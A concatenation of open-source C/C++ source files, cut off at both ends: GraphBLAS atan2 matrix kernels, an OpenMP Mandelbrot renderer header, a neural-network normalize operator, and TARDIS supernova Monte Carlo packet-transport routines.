double *GB_RESTRICT Cx = (double *) C->x ;
#include "GB_AxB_colscale_meta.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
#if 0
GrB_Info (none)
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double *GB_RESTRICT Cx = (double *) C->x ;
#include "GB_AxB_rowscale_meta.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// eWiseAdd: C = A+B or C<M> = A+B
//------------------------------------------------------------------------------
#undef GB_FREE_ALL
#define GB_FREE_ALL \
{ \
GB_ek_slice_free (&pstart_Mslice, &kfirst_Mslice, &klast_Mslice) ; \
GB_ek_slice_free (&pstart_Aslice, &kfirst_Aslice, &klast_Aslice) ; \
GB_ek_slice_free (&pstart_Bslice, &kfirst_Bslice, &klast_Bslice) ; \
}
GrB_Info GB_AaddB__atan2_fp64
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *GB_RESTRICT C_to_M,
const int64_t *GB_RESTRICT C_to_A,
const int64_t *GB_RESTRICT C_to_B,
const GB_task_struct *GB_RESTRICT TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t *pstart_Mslice = NULL, *kfirst_Mslice = NULL, *klast_Mslice = NULL ;
int64_t *pstart_Aslice = NULL, *kfirst_Aslice = NULL, *klast_Aslice = NULL ;
int64_t *pstart_Bslice = NULL, *kfirst_Bslice = NULL, *klast_Bslice = NULL ;
#include "GB_add_template.c"
GB_FREE_ALL ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C = A.*B or C<M> = A.*B
//------------------------------------------------------------------------------
GrB_Info GB_AemultB__atan2_fp64
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *GB_RESTRICT C_to_M,
const int64_t *GB_RESTRICT C_to_A,
const int64_t *GB_RESTRICT C_to_B,
const GB_task_struct *GB_RESTRICT TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t *pstart_Mslice = NULL, *kfirst_Mslice = NULL, *klast_Mslice = NULL ;
int64_t *pstart_Aslice = NULL, *kfirst_Aslice = NULL, *klast_Aslice = NULL ;
int64_t *pstart_Bslice = NULL, *kfirst_Bslice = NULL, *klast_Bslice = NULL ;
#include "GB_emult_template.c"
GB_FREE_ALL ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
GrB_Info GB_bind1st__atan2_fp64
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *GB_RESTRICT Bb,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double *Cx = (double *) Cx_output ;
double x = (*((double *) x_input)) ;
double *Bx = (double *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Bb, p)) continue ;
double bij = Bx [p] ;
Cx [p] = atan2 (x, bij) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
GrB_Info GB_bind2nd__atan2_fp64
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *GB_RESTRICT Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
double *Cx = (double *) Cx_output ;
double *Ax = (double *) Ax_input ;
double y = (*((double *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
double aij = Ax [p] ;
Cx [p] = atan2 (aij, y) ;
}
return (GrB_SUCCESS) ;
#endif
}
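// GB_bind1st and GB_bind2nd above differ only in which argument the scalar
// occupies: bind1st computes Cx [p] = atan2 (x, Bx [p]), while bind2nd
// computes Cx [p] = atan2 (Ax [p], y).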
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
double aij = Ax [pA] ; \
Cx [pC] = atan2 (x, aij) ; \
}
GrB_Info GB_bind1st_tran__atan2_fp64
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *GB_RESTRICT *Workspaces,
const int64_t *GB_RESTRICT A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
double
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double x = (*((const double *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
double
}
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
double aij = Ax [pA] ; \
Cx [pC] = atan2 (aij, y) ; \
}
GrB_Info GB_bind2nd_tran__atan2_fp64
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *GB_RESTRICT *Workspaces,
const int64_t *GB_RESTRICT A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double y = (*((const double *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
openmp.h | /**
control OpenMP on the cmd line:
set OMP_NUM_THREADS=16
*/
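// Equivalently, POSIX shells use
//   export OMP_NUM_THREADS=16
// and the count can be forced in code with omp_set_num_threads(16),
// which takes precedence over the environment variable.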
#pragma once
#ifdef OPENMP_FOUND
#include <omp.h>
#include "sequentiell.h"
#include "sse.h"
#include "intrinsics_helper.h"
namespace mandel
{
template<typename FLOAT_TYPE, typename RESULT_TYPE, typename PIXEL_TYPE = Pixel<FLOAT_TYPE>, typename TRANSFORM_TYPE = null_transform<RESULT_TYPE>>
struct CalcOpenMP : CalcMandelBrot < RESULT_TYPE >
{
virtual void doIt(const int width, const int height, const double dX1, const double dY1, const double dDx, const double dDy, std::vector<RESULT_TYPE> &picture) const
{
TRANSFORM_TYPE t;
PIXEL_TYPE pixel;
const auto x1 = static_cast<FLOAT_TYPE>(dX1);
const auto y1 = static_cast<FLOAT_TYPE>(dY1);
const auto dx = static_cast<FLOAT_TYPE>(dDx);
const auto dy = static_cast<FLOAT_TYPE>(dDy);
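// The /* ... /*/ ... //*/ lines below form a comment toggle: as written, the
// plain "parallel for" is commented out and the schedule(dynamic) variant is
// compiled; changing the opening /* to //* selects the plain pragma instead.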
/*
#pragma omp parallel for
/*/
#pragma omp parallel for schedule(dynamic)
//#pragma omp parallel for schedule(guided)
//*/
for (int j = 0; j < height; ++j) {
const FLOAT_TYPE y = (j * dy) + y1;
for (int i = 0; i < width; ++i) {
const FLOAT_TYPE x = (i * dx) + x1;
auto iter = pixel(x, y);
auto index = i + j * width;
assert(0 <= index && index < (int)picture.size());
picture[index] = t(iter);
}
}
}
};
}
#endif
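#if 0
// Hedged usage sketch (not part of this header): render an 800x600 view of
// the region [-2,1] x [-1,1]. The RESULT_TYPE of int and the default
// Pixel/null_transform parameters are assumptions based on the template
// declaration above; <vector> is assumed to be included by the caller.
std::vector<int> picture(800 * 600);
mandel::CalcOpenMP<double, int> calc;
calc.doIt(800, 600, -2.0, -1.0, 3.0 / 800.0, 2.0 / 600.0, picture);
#endif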
|
normalize_ref.c | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* License); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* AS IS BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*
* Copyright (c) 2021, OPEN AI LAB
* Author: jxyang@openailab.com
*/
#include "normalize_param.h"
#include "graph/tensor.h"
#include "graph/node.h"
#include "graph/graph.h"
#include "utility/sys_port.h"
#include "utility/float.h"
#include "utility/log.h"
#include "device/cpu/cpu_node.h"
#include "device/cpu/cpu_graph.h"
#include "device/cpu/cpu_module.h"
#include <math.h>
#include <string.h>
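/* norm_channel performs per-position L2 normalization across channels: for
 * every spatial position j,
 *   output(i,j) = input(i,j) * scale(i) / sqrt(sum_c input(c,j)^2)
 * buffer accumulates the sum of squares (and then holds its inverse square
 * root), so it must provide room for hw floats. */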
static void norm_channel(float* input, float* output, float* buffer, float* scale, int hw, int channel, int num_thread)
{
memset(buffer, 0, hw * sizeof(float));
//#pragma omp parallel for num_threads(num_thread)
for (int i = 0; i < channel; i++)
{
for (int j = 0; j < hw; j++)
{
float data = *(input + i * hw + j);
buffer[j] += (data * data);
}
}
//#pragma omp parallel for num_threads(num_thread)
for (int j = 0; j < hw; j++)
{
buffer[j] = 1.f / sqrt(buffer[j]);
}
//#pragma omp parallel for num_threads(num_thread)
for (int i = 0; i < channel; i++)
{
for (int j = 0; j < hw; j++)
{
float data = *(input + i * hw + j);
*(output + i * hw + j) = data * buffer[j] * scale[i];
}
}
}
static int init_node(struct node_ops* node_ops, struct exec_node* exec_node, struct exec_graph* exec_graph)
{
return 0;
}
static int release_node(struct node_ops* node_ops, struct exec_node* exec_node, struct exec_graph* exec_graph)
{
return 0;
}
static int run(struct node_ops* node_ops, struct exec_node* exec_node, struct exec_graph* exec_graph)
{
struct node* ir_node = exec_node->ir_node;
struct graph* ir_graph = ir_node->graph;
struct tensor* input_tensor = get_ir_graph_tensor(ir_graph, ir_node->input_tensors[0]);
struct tensor* output_tensor = get_ir_graph_tensor(ir_graph, ir_node->output_tensors[0]);
struct tensor* scale_tensor = get_ir_graph_tensor(ir_graph, ir_node->input_tensors[1]);
normalize_param_t* param = ( normalize_param_t* )(ir_node->op.param_mem);
float* input_org = ( float* )input_tensor->data;
float* output_org = ( float* )output_tensor->data;
float* scale_org = ( float* )scale_tensor->data;
int batch_number = input_tensor->dims[0];
int channel_num = input_tensor->dims[1];
int channel_size = (input_tensor->dims[2]) * (input_tensor->dims[3]);
int img_size = channel_num * channel_size;
float* buffer = ( float* )sys_malloc(channel_size * sizeof(float));
if (param->channel_shared == 0 && param->across_spatial == 0)
{
for (int i = 0; i < batch_number; i++)
{
norm_channel(input_org, output_org, buffer, scale_org, channel_size, channel_num, exec_graph->num_thread);
input_org += img_size;
output_org += img_size;
}
}
sys_free(buffer);
return 0;
}
static int score(struct node_ops* node_ops, struct exec_graph* exec_graph, struct node* exec_node)
{
return OPS_SCORE_BEST;
}
static struct node_ops normalize_node_ops = {.prerun = NULL,
.run = run,
.reshape = NULL,
.postrun = NULL,
.init_node = init_node,
.release_node = release_node,
.score = score};
int register_normalize_ref_op()
{
return register_builtin_node_ops(OP_NORMALIZE, &normalize_node_ops);
}
int unregister_normalize_ref_op()
{
return unregister_builtin_node_ops(OP_NORMALIZE, &normalize_node_ops);
}
|
cmontecarlo.c | #include <inttypes.h>
#ifdef WITHOPENMP
#include <omp.h>
#endif
#include "cmontecarlo.h"
/** Look for a place to insert a value in an inversely sorted double array.
*
* @param x an inversely (largest to lowest) sorted double array
* @param x_insert a value to insert
* @param imin lower bound
* @param imax upper bound
*
* @return index of the next boundary to the left
*/
static tardis_error_t
reverse_binary_search (const double *x, double x_insert,
int64_t imin, int64_t imax, int64_t * result)
{
/*
Have in mind that *x points to a reverse sorted array.
That is large values will have small indices and small ones
will have large indices.
*/
tardis_error_t ret_val = TARDIS_ERROR_OK;
if (x_insert > x[imin] || x_insert < x[imax])
{
ret_val = TARDIS_ERROR_BOUNDS_ERROR;
}
else
{
int64_t imid = (imin + imax) >> 1;
while (imax - imin > 2)
{
if (x[imid] < x_insert)
{
imax = imid + 1;
}
else
{
imin = imid;
}
imid = (imin + imax)>>1;
}
if (imax - imin == 2 && x_insert < x[imin + 1])
{
*result = imin + 1;
}
else
{
*result = imin;
}
}
return ret_val;
}
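#if 0
/* Hedged usage sketch (not part of the original file): searching a
   reverse-sorted array. With x = {9.0, 7.0, 5.0, 3.0, 1.0}, inserting 6.0
   between x[1] = 7.0 and x[2] = 5.0 yields result = 1, i.e. the index of
   7.0, the nearest boundary to the left, and err = TARDIS_ERROR_OK. */
double x[] = { 9.0, 7.0, 5.0, 3.0, 1.0 };
int64_t result;
tardis_error_t err = reverse_binary_search (x, 6.0, 0, 4, &result);
#endif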
tardis_error_t
line_search (const double *nu, double nu_insert, int64_t number_of_lines,
int64_t * result)
{
tardis_error_t ret_val = TARDIS_ERROR_OK;
int64_t imin = 0;
int64_t imax = number_of_lines - 1;
if (nu_insert > nu[imin])
{
*result = imin;
}
else if (nu_insert < nu[imax])
{
*result = imax + 1;
}
else
{
ret_val = reverse_binary_search (nu, nu_insert, imin, imax, result);
*result = *result + 1;
}
return ret_val;
}
double
rpacket_doppler_factor (const rpacket_t *packet, const storage_model_t *storage)
{
return 1.0 -
rpacket_get_mu (packet) * rpacket_get_r (packet) *
storage->inverse_time_explosion * INVERSE_C;
}
/* Methods for calculating continuum opacities */
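/* bf_cross_section below applies the standard hydrogenic frequency scaling
   sigma_bf(nu) = sigma_edge * (nu_edge / nu)^3, which is what the
   tmp*tmp*tmp factor computes. */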
double
bf_cross_section(const storage_model_t * storage, int64_t continuum_id, double comov_nu)
{
// FIXME MR: this seems like it should not be used in production!
/* Temporary hardcoded values */
#define chi_bf_partial 0.25e-15
static const double cont_chi_bf[] = {chi_bf_partial, 0.0, 2.0 * chi_bf_partial, 0.3 * chi_bf_partial, 2.0 * chi_bf_partial};
#undef chi_bf_partial
/* End of temporary hardcoded values */
double sigma_bf = cont_chi_bf[continuum_id]; //storage->bf_cross_sections[continuum_id]
double tmp=storage->continuum_list_nu[continuum_id] / comov_nu;
return sigma_bf * tmp*tmp*tmp;
}
void calculate_chi_bf(rpacket_t * packet, storage_model_t * storage)
{
double doppler_factor = rpacket_doppler_factor (packet, storage);
double comov_nu = rpacket_get_nu (packet) * doppler_factor;
int64_t no_of_continuum_edges = storage->no_of_edges;
int64_t current_continuum_id;
line_search(storage->continuum_list_nu, comov_nu, no_of_continuum_edges, &current_continuum_id);
rpacket_set_current_continuum_id(packet, current_continuum_id);
int64_t shell_id = rpacket_get_current_shell_id(packet);
double T = storage->t_electrons[shell_id];
double boltzmann_factor = exp(-(H * comov_nu) / (KB*T));
double bf_helper = 0;
for(int64_t i = current_continuum_id; i < no_of_continuum_edges; i++)
{
// get the levelpopulation for the level ijk in the current shell:
double l_pop = storage->l_pop[shell_id * no_of_continuum_edges + i];
// get the levelpopulation ratio \frac{n_{0,j+1,k}}{n_{i,j,k}} \frac{n_{i,j,k}}{n_{0,j+1,k}}^{*}:
double l_pop_r = storage->l_pop_r[shell_id * no_of_continuum_edges + i];
bf_helper += l_pop * bf_cross_section(storage, i, comov_nu) * (1 - l_pop_r * boltzmann_factor);
// FIXME MR: Is this thread-safe? It doesn't look like it to me ...
storage->chi_bf_tmp_partial[i] = bf_helper;
}
rpacket_set_chi_boundfree(packet, bf_helper * doppler_factor);
}
double
compute_distance2boundary (rpacket_t * packet, const storage_model_t * storage)
{
double r = rpacket_get_r (packet);
double mu = rpacket_get_mu (packet);
double r_outer = storage->r_outer[rpacket_get_current_shell_id (packet)];
double r_inner = storage->r_inner[rpacket_get_current_shell_id (packet)];
double d_outer =
sqrt (r_outer * r_outer + ((mu * mu - 1.0) * r * r)) - (r * mu);
double d_inner;
if (rpacket_get_recently_crossed_boundary (packet) == 1)
{
rpacket_set_next_shell_id (packet, 1);
return d_outer;
}
else
{
double check = r_inner * r_inner + (r * r * (mu * mu - 1.0));
if (check < 0.0)
{
rpacket_set_next_shell_id (packet, 1);
return d_outer;
}
else
{
d_inner = mu < 0.0 ? -r * mu - sqrt (check) : MISS_DISTANCE;
}
}
if (d_inner < d_outer)
{
rpacket_set_next_shell_id (packet, -1);
return d_inner;
}
else
{
rpacket_set_next_shell_id (packet, 1);
return d_outer;
}
}
tardis_error_t
compute_distance2line (const rpacket_t * packet, const storage_model_t * storage,
double *result)
{
tardis_error_t ret_val = TARDIS_ERROR_OK;
if (rpacket_get_last_line (packet))
{
*result = MISS_DISTANCE;
}
else
{
double r = rpacket_get_r (packet);
double mu = rpacket_get_mu (packet);
double nu = rpacket_get_nu (packet);
double nu_line = rpacket_get_nu_line (packet);
double t_exp = storage->time_explosion;
double inverse_t_exp = storage->inverse_time_explosion;
int64_t cur_zone_id = rpacket_get_current_shell_id (packet);
double doppler_factor = 1.0 - mu * r * inverse_t_exp * INVERSE_C;
double comov_nu = nu * doppler_factor;
if (comov_nu < nu_line)
{
if (rpacket_get_next_line_id (packet) == storage->no_of_lines - 1)
{
fprintf (stderr, "last_line = %f\n",
storage->
line_list_nu[rpacket_get_next_line_id (packet) - 1]);
fprintf (stderr, "Last line in line list reached!");
}
else if (rpacket_get_next_line_id (packet) == 0)
{
fprintf (stderr, "First line in line list!");
fprintf (stderr, "next_line = %f\n",
storage->
line_list_nu[rpacket_get_next_line_id (packet) + 1]);
}
else
{
fprintf (stderr, "last_line = %f\n",
storage->
line_list_nu[rpacket_get_next_line_id (packet) - 1]);
fprintf (stderr, "next_line = %f\n",
storage->
line_list_nu[rpacket_get_next_line_id (packet) + 1]);
}
fprintf (stderr, "ERROR: Comoving nu less than nu_line!\n");
fprintf (stderr, "comov_nu = %f\n", comov_nu);
fprintf (stderr, "nu_line = %f\n", nu_line);
fprintf (stderr, "(comov_nu - nu_line) / nu_line = %f\n",
(comov_nu - nu_line) / nu_line);
fprintf (stderr, "r = %f\n", r);
fprintf (stderr, "mu = %f\n", mu);
fprintf (stderr, "nu = %f\n", nu);
fprintf (stderr, "doppler_factor = %f\n", doppler_factor);
fprintf (stderr, "cur_zone_id = %" PRIi64 "\n", cur_zone_id);
ret_val = TARDIS_ERROR_COMOV_NU_LESS_THAN_NU_LINE;
}
else
{
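/* In homologous expansion the comoving frequency decreases linearly
   along the flight path, so the packet reaches resonance with the
   line after d = c * t_exp * (comov_nu - nu_line) / nu. */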
*result = ((comov_nu - nu_line) / nu) * C * t_exp;
}
}
return ret_val;
}
void
compute_distance2continuum(rpacket_t * packet, storage_model_t * storage)
{
double chi_freefree, chi_electron, chi_continuum, d_continuum;
if (storage->cont_status == CONTINUUM_ON)
{
calculate_chi_bf(packet, storage);
double chi_boundfree = rpacket_get_chi_boundfree(packet);
rpacket_set_chi_freefree(packet, 0.0);
chi_freefree = rpacket_get_chi_freefree(packet); // MR ?? this is always zero
chi_electron = storage->electron_densities[rpacket_get_current_shell_id(packet)] * storage->sigma_thomson *
rpacket_doppler_factor (packet, storage);
chi_continuum = chi_boundfree + chi_freefree + chi_electron;
d_continuum = rpacket_get_tau_event(packet) / chi_continuum;
}
else
{
// FIXME MR: an assignment to chi_freefree seems to be missing here
chi_electron = storage->electron_densities[rpacket_get_current_shell_id(packet)] * storage->sigma_thomson;
chi_continuum = chi_electron;
d_continuum = storage->inverse_electron_densities[rpacket_get_current_shell_id (packet)] *
storage->inverse_sigma_thomson * rpacket_get_tau_event (packet);
}
if (rpacket_get_virtual_packet(packet) > 0)
{
//Set all continuum distances to MISS_DISTANCE in case of an virtual_packet
rpacket_set_d_continuum(packet, MISS_DISTANCE);
rpacket_set_chi_boundfree(packet, 0.0);
rpacket_set_chi_electron(packet, chi_electron);
rpacket_set_chi_freefree(packet, 0.0);
rpacket_set_chi_continuum(packet, chi_continuum);
}
else
{
// fprintf(stderr, "--------\n");
// fprintf(stderr, "nu = %e \n", rpacket_get_nu(packet));
// fprintf(stderr, "chi_electron = %e\n", chi_electron);
// fprintf(stderr, "chi_boundfree = %e\n", calculate_chi_bf(packet, storage));
// fprintf(stderr, "chi_line = %e \n", rpacket_get_tau_event(packet) / rpacket_get_d_line(packet));
// fprintf(stderr, "--------\n");
rpacket_set_chi_freefree(packet, chi_freefree);
rpacket_set_chi_electron(packet, chi_electron);
rpacket_set_chi_continuum(packet, chi_continuum);
rpacket_set_d_continuum(packet, d_continuum);
}
}
int64_t
macro_atom (const rpacket_t * packet, const storage_model_t * storage, rk_state *mt_state)
{
int emit = 0, i = 0, probability_idx = -1;
int activate_level =
storage->line2macro_level_upper[rpacket_get_next_line_id (packet) - 1];
while (emit != -1)
{
double event_random = rk_double (mt_state);
i = storage->macro_block_references[activate_level] - 1;
double p = 0.0;
do
{
probability_idx = ((++i) * storage->no_of_shells +
rpacket_get_current_shell_id (packet));
p += storage->transition_probabilities[probability_idx];
}
while (p <= event_random);
emit = storage->transition_type[i];
activate_level = storage->destination_level_id[i];
}
return storage->transition_line_id[i];
}
double
move_packet (rpacket_t * packet, storage_model_t * storage, double distance)
{
double doppler_factor = rpacket_doppler_factor (packet, storage);
if (distance > 0.0)
{
double r = rpacket_get_r (packet);
double new_r =
sqrt (r * r + distance * distance +
2.0 * r * distance * rpacket_get_mu (packet));
rpacket_set_mu (packet,
(rpacket_get_mu (packet) * r + distance) / new_r);
rpacket_set_r (packet, new_r);
if (rpacket_get_virtual_packet (packet) <= 0)
{
double comov_energy = rpacket_get_energy (packet) * doppler_factor;
double comov_nu = rpacket_get_nu (packet) * doppler_factor;
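/* The js and nubars arrays are per-shell estimators shared by all
   threads, so the updates below must be atomic when OpenMP is enabled. */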
#ifdef WITHOPENMP
#pragma omp atomic
#endif
storage->js[rpacket_get_current_shell_id (packet)] +=
comov_energy * distance;
#ifdef WITHOPENMP
#pragma omp atomic
#endif
storage->nubars[rpacket_get_current_shell_id (packet)] +=
comov_energy * distance * comov_nu;
}
}
return doppler_factor;
}
void
increment_j_blue_estimator (const rpacket_t * packet, storage_model_t * storage,
double d_line, int64_t j_blue_idx)
{
double r = rpacket_get_r (packet);
double r_interaction =
sqrt (r * r + d_line * d_line +
2.0 * r * d_line * rpacket_get_mu (packet));
double mu_interaction = (rpacket_get_mu (packet) * r + d_line) / r_interaction;
double doppler_factor = 1.0 - mu_interaction * r_interaction *
storage->inverse_time_explosion * INVERSE_C;
double comov_energy = rpacket_get_energy (packet) * doppler_factor;
#ifdef WITHOPENMP
#pragma omp atomic
#endif
storage->line_lists_j_blues[j_blue_idx] +=
comov_energy / rpacket_get_nu (packet);
}
int64_t
montecarlo_one_packet (storage_model_t * storage, rpacket_t * packet,
int64_t virtual_mode, rk_state *mt_state)
{
int64_t reabsorbed=-1;
if (virtual_mode == 0)
{
reabsorbed = montecarlo_one_packet_loop (storage, packet, 0, mt_state);
}
else
{
if ((rpacket_get_nu (packet) > storage->spectrum_virt_start_nu) && (rpacket_get_nu(packet) < storage->spectrum_virt_end_nu))
{
for (int64_t i = 0; i < rpacket_get_virtual_packet_flag (packet); i++)
{
double weight;
rpacket_t virt_packet = *packet;
double mu_min;
if (rpacket_get_r(&virt_packet) > storage->r_inner[0])
{
mu_min =
-1.0 * sqrt (1.0 -
(storage->r_inner[0] / rpacket_get_r(&virt_packet)) *
(storage->r_inner[0] / rpacket_get_r(&virt_packet)));
}
else
{
mu_min = 0.0;
}
double mu_bin = (1.0 - mu_min) / rpacket_get_virtual_packet_flag (packet);
rpacket_set_mu(&virt_packet,mu_min + (i + rk_double (mt_state)) * mu_bin);
switch (virtual_mode)
{
case -2:
weight = 1.0 / rpacket_get_virtual_packet_flag (packet);
break;
case -1:
weight =
2.0 * rpacket_get_mu(&virt_packet) /
rpacket_get_virtual_packet_flag (packet);
break;
case 1:
weight =
(1.0 -
mu_min) / 2.0 / rpacket_get_virtual_packet_flag (packet);
break;
default:
fprintf (stderr, "Something has gone horribly wrong!\n");
// FIXME MR: we need to somehow signal an error here
// I'm adding an exit() here to inform the compiler about the impossible path
exit(1);
}
double doppler_factor_ratio =
rpacket_doppler_factor (packet, storage) /
rpacket_doppler_factor (&virt_packet, storage);
rpacket_set_energy(&virt_packet,
rpacket_get_energy (packet) * doppler_factor_ratio);
rpacket_set_nu(&virt_packet,rpacket_get_nu (packet) * doppler_factor_ratio);
reabsorbed = montecarlo_one_packet_loop (storage, &virt_packet, 1, mt_state);
if ((rpacket_get_nu(&virt_packet) < storage->spectrum_end_nu) &&
(rpacket_get_nu(&virt_packet) > storage->spectrum_start_nu))
{
#ifdef WITHOPENMP
#pragma omp critical
{
#endif
if (storage->virt_packet_count >= storage->virt_array_size)
{
storage->virt_array_size *= 2;
storage->virt_packet_nus = realloc(storage->virt_packet_nus, sizeof(double) * storage->virt_array_size);
storage->virt_packet_energies = realloc(storage->virt_packet_energies, sizeof(double) * storage->virt_array_size);
storage->virt_packet_last_interaction_in_nu = realloc(storage->virt_packet_last_interaction_in_nu, sizeof(double) * storage->virt_array_size);
storage->virt_packet_last_interaction_type = realloc(storage->virt_packet_last_interaction_type, sizeof(int64_t) * storage->virt_array_size);
storage->virt_packet_last_line_interaction_in_id = realloc(storage->virt_packet_last_line_interaction_in_id, sizeof(int64_t) * storage->virt_array_size);
storage->virt_packet_last_line_interaction_out_id = realloc(storage->virt_packet_last_line_interaction_out_id, sizeof(int64_t) * storage->virt_array_size);
}
storage->virt_packet_nus[storage->virt_packet_count] = rpacket_get_nu(&virt_packet);
storage->virt_packet_energies[storage->virt_packet_count] = rpacket_get_energy(&virt_packet) * weight;
storage->virt_packet_last_interaction_in_nu[storage->virt_packet_count] = storage->last_interaction_in_nu[rpacket_get_id (packet)];
storage->virt_packet_last_interaction_type[storage->virt_packet_count] = storage->last_interaction_type[rpacket_get_id (packet)];
storage->virt_packet_last_line_interaction_in_id[storage->virt_packet_count] = storage->last_line_interaction_in_id[rpacket_get_id (packet)];
storage->virt_packet_last_line_interaction_out_id[storage->virt_packet_count] = storage->last_line_interaction_out_id[rpacket_get_id (packet)];
storage->virt_packet_count += 1;
int64_t virt_id_nu =
floor ((rpacket_get_nu(&virt_packet) -
storage->spectrum_start_nu) /
storage->spectrum_delta_nu);
storage->spectrum_virt_nu[virt_id_nu] +=
rpacket_get_energy(&virt_packet) * weight;
#ifdef WITHOPENMP
}
#endif
}
}
}
else
{
return 1;
}
}
return reabsorbed;
}
void
move_packet_across_shell_boundary (rpacket_t * packet,
storage_model_t * storage, double distance, rk_state *mt_state)
{
move_packet (packet, storage, distance);
if (rpacket_get_virtual_packet (packet) > 0)
{
double delta_tau_event = rpacket_get_chi_continuum(packet) * distance;
rpacket_set_tau_event (packet,
rpacket_get_tau_event (packet) +
delta_tau_event);
}
else
{
rpacket_reset_tau_event (packet, mt_state);
}
if ((rpacket_get_current_shell_id (packet) < storage->no_of_shells - 1
&& rpacket_get_next_shell_id (packet) == 1)
|| (rpacket_get_current_shell_id (packet) > 0
&& rpacket_get_next_shell_id (packet) == -1))
{
rpacket_set_current_shell_id (packet,
rpacket_get_current_shell_id (packet) +
rpacket_get_next_shell_id (packet));
rpacket_set_recently_crossed_boundary (packet,
rpacket_get_next_shell_id
(packet));
}
else if (rpacket_get_next_shell_id (packet) == 1)
{
rpacket_set_status (packet, TARDIS_PACKET_STATUS_EMITTED);
}
else if ((storage->reflective_inner_boundary == 0) ||
(rk_double (mt_state) > storage->inner_boundary_albedo))
{
rpacket_set_status (packet, TARDIS_PACKET_STATUS_REABSORBED);
}
else
{
double doppler_factor = rpacket_doppler_factor (packet, storage);
double comov_nu = rpacket_get_nu (packet) * doppler_factor;
double comov_energy = rpacket_get_energy (packet) * doppler_factor;
rpacket_set_mu (packet, rk_double (mt_state));
double inverse_doppler_factor = 1.0 / rpacket_doppler_factor (packet, storage);
rpacket_set_nu (packet, comov_nu * inverse_doppler_factor);
rpacket_set_energy (packet, comov_energy * inverse_doppler_factor);
rpacket_set_recently_crossed_boundary (packet, 1);
if (rpacket_get_virtual_packet_flag (packet) > 0)
{
montecarlo_one_packet (storage, packet, -2, mt_state);
}
}
}
void
montecarlo_thomson_scatter (rpacket_t * packet, storage_model_t * storage,
double distance, rk_state *mt_state)
{
double doppler_factor = move_packet (packet, storage, distance);
double comov_nu = rpacket_get_nu (packet) * doppler_factor;
double comov_energy = rpacket_get_energy (packet) * doppler_factor;
rpacket_set_mu (packet, 2.0 * rk_double (mt_state) - 1.0);
double inverse_doppler_factor = 1.0 / rpacket_doppler_factor (packet, storage);
rpacket_set_nu (packet, comov_nu * inverse_doppler_factor);
rpacket_set_energy (packet, comov_energy * inverse_doppler_factor);
rpacket_reset_tau_event (packet, mt_state);
rpacket_set_recently_crossed_boundary (packet, 0);
storage->last_interaction_type[rpacket_get_id (packet)] = 1;
if (rpacket_get_virtual_packet_flag (packet) > 0)
{
montecarlo_one_packet (storage, packet, 1, mt_state);
}
}
void
montecarlo_bound_free_scatter (rpacket_t * packet, storage_model_t * storage, double distance, rk_state *mt_state)
{
